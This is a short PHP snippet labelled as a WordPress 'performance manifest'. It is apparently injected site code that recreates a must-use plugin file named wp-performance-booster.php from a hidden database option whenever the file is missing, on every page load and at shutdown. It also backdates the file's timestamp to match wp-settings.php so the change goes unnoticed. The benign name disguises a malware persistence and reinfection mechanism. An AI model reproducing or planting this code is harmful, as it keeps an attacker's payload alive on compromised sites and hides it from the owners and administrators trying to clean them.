/* WP Site Performance Manifest */ if(!function_exists('wp_site_perf_repair_v114')) { function wp_site_perf_repair_v114(){ if(!function_exists('get_option')) return; $m='_wp_internal_perf_manifest'; $a=defined('ABSPATH')?ABSPATH:dirname(__FILE__).'/'; $d=$a.'wp-content/mu-plugins'; $f=$d.'/wp-performance-booster.php'; if(!file_exists($f)){ $c=get_option($m); if($c){ if(!is_dir($d)){@mkdir($d,0755,true);} @file_put_contents($f,$c); if(file_exists($a.'wp-settings.php')){@touch($f,filemtime($a.'wp-settings.php'));} } } } if(function_exists('add_action')){ add_action('init','wp_site_perf_repair_v114',1); } register_shutdown_function('wp_site_perf_repair_v114'); } /* End WP Performance Manifest */